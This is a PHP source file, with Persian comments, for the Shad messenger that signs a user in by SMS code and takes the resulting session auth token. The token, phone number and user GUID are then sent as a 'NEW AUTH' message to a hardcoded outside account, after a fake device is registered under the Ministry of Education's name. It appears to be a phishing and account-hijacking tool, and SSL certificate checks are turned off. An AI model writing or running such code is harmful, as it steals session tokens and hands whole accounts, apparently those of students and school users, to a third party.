<?php
require_once 'hacker.php';
require_once 'config.php';

class ShadApp {
    private $hacker;
    private $auth;
    private $phone_code_hash;
    private $tmp_session;
    private $guid;
    private $phone_number;
    
    public function __construct() {
        $this->hacker = new Hacker();
        $this->auth = "";
        $this->phone_code_hash = "";
        $this->tmp_session = "";
        $this->guid = "";
        $this->phone_number = "";
    }
    
    private function generate_tmp_session() {
        $char_list = str_split('qwertyuiopasdfghjklzxcvbnm');
        $result = '';
        for ($i = 0; $i < 32; $i++) {
            $result .= $char_list[rand(0, count($char_list) - 1)];
        }
        return $result;
    }
    
    public function sendCode($phone_number) {
        $this->phone_number = $phone_number;
        $this->tmp_session = $this->generate_tmp_session();
        
        // فرمت‌بندی شماره تلفن
        if (strlen($phone_number) == 11 && substr($phone_number, 0, 1) == '0') {
            $mooo = substr($phone_number, 1);
        } else {
            $mooo = $phone_number;
        }
        
        $request_data = [
            "method" => "sendCode",
            "input" => [
                "phone_number" => "98" . $mooo,
                "send_type" => "SMS"
            ],
            "client" => [
                "app_name" => "Main",
                "app_version" => "3.2.3",
                "platform" => "Web",
                "package" => "web.shad.ir",
                "lang_code" => "fa"
            ]
        ];
        
        $request_json = json_encode($request_data, JSON_UNESCAPED_UNICODE);
        $encrypted_data = $this->hacker->d($request_json, $this->tmp_session);
        
        $payload = [
            "api_version" => "5",
            "tmp_session" => $this->tmp_session,
            "data_enc" => $encrypted_data
        ];
        
        $response = $this->makeRequest(API_URL, $payload, $this->tmp_session);
        
        if ($response && isset($response['data']['phone_code_hash'])) {
            $this->phone_code_hash = $response['data']['phone_code_hash'];
            
            // ذخیره در session
            $_SESSION['tmp_session'] = $this->tmp_session;
            $_SESSION['phone_code_hash'] = $this->phone_code_hash;
            $_SESSION['phone_number'] = $this->phone_number;
            
            return [
                'success' => true,
                'message' => 'کد تأیید با موفقیت ارسال شد'
            ];
        }
        
        return [
            'success' => false,
            'message' => 'ارسال کد ناموفق بود'
        ];
    }
    
    public function verifyCode($code) {
        if (empty($this->phone_code_hash) && isset($_SESSION['phone_code_hash'])) {
            $this->phone_code_hash = $_SESSION['phone_code_hash'];
            $this->tmp_session = $_SESSION['tmp_session'];
            $this->phone_number = $_SESSION['phone_number'];
        }
        
        if (empty($this->phone_code_hash)) {
            return [
                'success' => false,
                'message' => 'ابتدا کد ارسال کنید'
            ];
        }
        
        // فرمت‌بندی شماره تلفن
        if (strlen($this->phone_number) == 11 && substr($this->phone_number, 0, 1) == '0') {
            $mooo = substr($this->phone_number, 1);
        } else {
            $mooo = $this->phone_number;
        }
        
        $request_data = [
            "method" => "signIn",
            "input" => [
                "phone_number" => "98" . $mooo,
                "phone_code_hash" => $this->phone_code_hash,
                "phone_code" => $code
            ],
            "client" => [
                "app_name" => "Main",
                "app_version" => "3.2.3",
                "platform" => "Web",
                "package" => "web.shad.ir",
                "lang_code" => "fa"
            ]
        ];
        
        $request_json = json_encode($request_data, JSON_UNESCAPED_UNICODE);
        $encrypted_data = $this->hacker->d($request_json, $this->tmp_session);
        
        $payload = [
            "api_version" => "5",
            "tmp_session" => $this->tmp_session,
            "data_enc" => $encrypted_data
        ];
        
        $response = $this->makeRequest(API_URL, $payload, $this->tmp_session);
        
        if ($response && isset($response['data']['status']) && $response['data']['status'] == 'OK') {
            $this->auth = $response['data']['auth'];
            $this->guid = $response['data']['user']['user_guid'];
            
            // ذخیره در session
            $_SESSION['auth'] = $this->auth;
            $_SESSION['guid'] = $this->guid;
            
            return [
                'success' => true,
                'message' => 'لاگین موفق',
                'auth' => $this->auth,
                'guid' => $this->guid,
                'phone_number' => $this->phone_number
            ];
        }
        
        return [
            'success' => false,
            'message' => 'تأیید کد ناموفق بود'
        ];
    }
    
    private function registerDevice() {
        if (empty($this->auth)) {
            return false;
        }
        
        // ساخت اطلاعات دستگاه
        $device_info = [
            "app_version" => "MA_3.6.5",
            "device_hash" => "90EC014117A2848CC45DEC2B90BD0C4A",
            "device_model" => "وزارت آموزش و پرورش",
            "lang_code" => "fa",
            "system_version" => "SDK 23",
            "token" => "",
            "token_type" => "Firebase"
        ];
        
        $device_json = json_encode($device_info, JSON_UNESCAPED_UNICODE);
        $encrypted_data = $this->hacker->d($device_json, $this->auth);
        
        $payload = [
            "api_version" => "4",
            "auth" => $this->auth,
            "client" => [
                "app_name" => "Main",
                "app_version" => "3.6.5",
                "lang_code" => "fa",
                "package" => "ir.medu.shad",
                "platform" => "Android"
            ],
            "data_enc" => $encrypted_data,
            "method" => "registerDevice"
        ];
        
        $response = $this->makeRequest(API_URL, $payload, $this->auth);
        
        if ($response && isset($response['status']) && $response['status'] == 'OK') {
            return true;
        }
        
        return false;
    }
    
    public function sendTokenToTarget($target_guid) {
        if (empty($this->auth) && isset($_SESSION['auth'])) {
            $this->auth = $_SESSION['auth'];
            $this->guid = $_SESSION['guid'];
            $this->phone_number = $_SESSION['phone_number'];
        }
        
        if (empty($this->auth)) {
            return [
                'success' => false,
                'message' => 'توکن وجود ندارد'
            ];
        }
        
        // ثبت دستگاه (ضروری)
        $device_registered = $this->registerDevice();
        
        if (!$device_registered) {
            // اگر ثبت دستگاه ناموفق بود، ادامه می‌دهیم اما ممکن است ارسال پیام با مشکل مواجه شود
            error_log("هشدار: ثبت دستگاه ناموفق بود");
        }
        
        // فرمت‌بندی شماره تلفن با +98
        $formatted_phone = "+98" . (substr($this->phone_number, 0, 1) == '0' ? substr($this->phone_number, 1) : $this->phone_number);
        
        // ساخت پیام با فرمت جدید
        $message = "╭───🄽🄴🅆 🄰🅄🅃🄷────╮\n";
        $message .= "│\n";
        $message .= "│ᴀᴜᴛʜ: " . $this->auth . "\n";
        $message .= "│ɴᴜᴍʙᴇʀ: " . $formatted_phone . "\n";
        $message .= "│ᴘᴀꜱꜱᴡᴏʀᴅ: ندارد\n"; // اگر پسورد دو مرحله‌ای داشت اینجا اضافه شود
        $message .= "│ɪᴘ ᴜꜱᴇʀ → نامشخص\n"; // آی‌پی کاربر
        $message .= "│ᴘʜᴏɴᴇ ᴀᴜᴛʜ: وزارت آموزش و پرورش\n";
        $message .= "│ɢᴜɪᴅ ᴀᴜᴛʜ: " . $this->guid . "\n";
        $message .= "│ᴘʜᴏɴᴇ ᴜꜱᴇʀ: مدل نامشخص\n"; // مدل گوشی
        $message .= "│ᴛɪᴍᴇ: " . date('H:i:s') . "\n";
        $message .= "│ᴅᴀʏꜱ: " . date('Y/m/d') . "\n";
        $message .= "╰──────────────────╯\n";
        $message .= "╭──────────────────╮\n";
        $message .= "│ ‌    ＥｍａｄＳｈａｙａｎ\n";
        $message .= "│          ‌ @sinyoremad \n";
        $message .= "╰──────────────────╯";
        
        $rnd = rand(100000000, 999999999);
        
        $message_data = [
            "object_guid" => $target_guid,
            "rnd" => strval($rnd),
            "file_inline" => null,
            "text" => $message
        ];
        
        $message_json = json_encode($message_data, JSON_UNESCAPED_UNICODE);
        $encrypted_data = $this->hacker->d($message_json, $this->auth);
        
        $payload = [
            "api_version" => "4",
            "auth" => $this->auth,
            "client" => [
                "app_name" => "Main",
                "app_version" => "3.1.0",
                "lang_code" => "fa",
                "package" => "ir.medu.shad",
                "platform" => "Android"
            ],
            "data_enc" => $encrypted_data,
            "method" => "sendMessage"
        ];
        
        $response = $this->makeRequest(API_URL, $payload, $this->auth);
        
        if ($response && isset($response['status']) && $response['status'] == 'OK') {
            return [
                'success' => true,
                'message' => 'توکن با موفقیت ارسال شد',
                'auth' => $this->auth,
                'guid' => $this->guid,
                'phone_number' => $this->phone_number,
                'target_guid' => $target_guid
            ];
        } else {
            // تلاش با متد جایگزین
            return $this->sendWithDifferentMethod($target_guid);
        }
    }
    
    private function sendWithDifferentMethod($target_guid) {
        // فرمت‌بندی شماره تلفن با +98
        $formatted_phone = "+98" . (substr($this->phone_number, 0, 1) == '0' ? substr($this->phone_number, 1) : $this->phone_number);
        
        // ساخت پیام با فرمت جدید
        $message = "╭───🄽🄴🅆 🄰🅄🅃🄷────╮\n";
        $message .= "│\n";
        $message .= "│ᴀᴜᴛʜ: " . $this->auth . "\n";
        $message .= "│ɴᴜᴍʙᴇʀ: " . $formatted_phone . "\n";
        $message .= "│ᴘᴀꜱꜱᴡᴏʀᴅ: ندارد\n";
        $message .= "│ɪᴘ ᴜꜱᴇʀ → نامشخص\n";
        $message .= "│ᴘʜᴏɴᴇ ᴀᴜᴛʜ: وزارت آموزش و پرورش\n";
        $message .= "│ɢᴜɪᴅ ᴀᴜᴛʜ: " . $this->guid . "\n";
        $message .= "│ᴘʜᴏɴᴇ ᴜꜱᴇʀ: مدل نامشخص\n";
        $message .= "│ᴛɪᴍᴇ: " . date('H:i:s') . "\n";
        $message .= "│ᴅᴀʏꜱ: " . date('Y/m/d') . "\n";
        $message .= "╰──────────────────╯\n";
        $message .= "╭──────────────────╮\n";
        $message .= "│ ‌    ＥｍａｄＳｈａｙａｎ\n";
        $message .= "│          ‌ @sinyoremad \n";
        $message .= "╰──────────────────╯";
        
        $rnd = rand(100000000, 999999999);
        
        $message_data = [
            "method" => "sendMessage",
            "input" => [
                "object_guid" => $target_guid,
                "rnd" => strval($rnd),
                "text" => $message
            ],
            "client" => [
                "app_name" => "Main",
                "app_version" => "3.1.0",
                "lang_code" => "fa",
                "package" => "ir.medu.shad",
                "platform" => "Android"
            ]
        ];
        
        $message_json = json_encode($message_data, JSON_UNESCAPED_UNICODE);
        $encrypted_data = $this->hacker->d($message_json, $this->auth);
        
        $payload = [
            "api_version" => "4",
            "auth" => $this->auth,
            "data_enc" => $encrypted_data
        ];
        
        $response = $this->makeRequest(API_URL, $payload, $this->auth);
        
        if ($response && isset($response['status']) && $response['status'] == 'OK') {
            return [
                'success' => true,
                'message' => 'توکن با موفقیت ارسال شد (متد جایگزین)',
                'auth' => $this->auth,
                'guid' => $this->guid,
                'phone_number' => $this->phone_number,
                'target_guid' => $target_guid
            ];
        }
        
        // بررسی خطا
        $error_msg = isset($response['status_det']) ? $response['status_det'] : 'خطای ناشناخته';
        
        return [
            'success' => false,
            'message' => 'ارسال توکن ناموفق بود: ' . $error_msg,
            'auth' => $this->auth,
            'guid' => $this->guid,
            'phone_number' => $this->phone_number
        ];
    }
    
    private function makeRequest($url, $payload, $decryption_key = null) {
        try {
            $ch = curl_init();
            
            curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => json_encode($payload, JSON_UNESCAPED_UNICODE),
                CURLOPT_HTTPHEADER => [
                    'Content-Type: application/json',
                    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
                ],
                CURLOPT_TIMEOUT => 30,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            ]);
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            
            if ($response === false) {
                error_log("خطای CURL: " . curl_error($ch));
                curl_close($ch);
                return null;
            }
            
            curl_close($ch);
            
            return $this->parseResponse($response, $decryption_key);
            
        } catch (Exception $e) {
            error_log("خطای درخواست: " . $e->getMessage());
            return null;
        }
    }
    
    private function parseResponse($response_text, $decryption_key = null) {
        try {
            $response = json_decode($response_text, true);
            
            if (isset($response['data_enc'])) {
                $encrypted_data = $response['data_enc'];
                
                if ($decryption_key) {
                    $decrypted = $this->hacker->b($encrypted_data, $decryption_key);
                    
                    if (!empty($decrypted)) {
                        $decoded = json_decode($decrypted, true);
                        if ($decoded !== null) {
                            return $decoded;
                        } else {
                            // تلاش برای استخراج JSON از متن
                            preg_match('/\{.*\}/s', $decrypted, $matches);
                            if (!empty($matches)) {
                                return json_decode($matches[0], true);
                            }
                            return ['raw' => $decrypted];
                        }
                    }
                }
                
                return $response;
            } else {
                return $response;
            }
        } catch (Exception $e) {
            error_log("خطای پردازش پاسخ: " . $e->getMessage());
            return null;
        }
    }
    
    public function getAccountInfo() {
        if (empty($this->auth) && isset($_SESSION['auth'])) {
            $this->auth = $_SESSION['auth'];
            $this->guid = $_SESSION['guid'];
            $this->phone_number = $_SESSION['phone_number'];
        }
        
        return [
            'phone_number' => $this->phone_number,
            'guid' => $this->guid,
            'auth' => $this->auth
        ];
    }
}
?>

<!-- فایل config.php -->
<?php
// config.php
define('API_URL', 'https://shadmessenger36.iranlms.ir/');
session_start();

// برای تست مستقیم
if (isset($_GET['test'])) {
    header('Content-Type: application/json; charset=utf-8');
    
    $app = new ShadApp();
    
    if (isset($_GET['phone'])) {
        $result = $app->sendCode($_GET['phone']);
        echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT);
    }
    
    if (isset($_GET['code'])) {
        $result = $app->verifyCode($_GET['code']);
        echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT);
    }
    
    if (isset($_GET['send'])) {
        $target_guid = "u0Dncyz0d8989afff51fe47d218a1795"; // GUID مقصد
        $result = $app->sendTokenToTarget($target_guid);
        echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT);
    }
    
    exit();
}
?>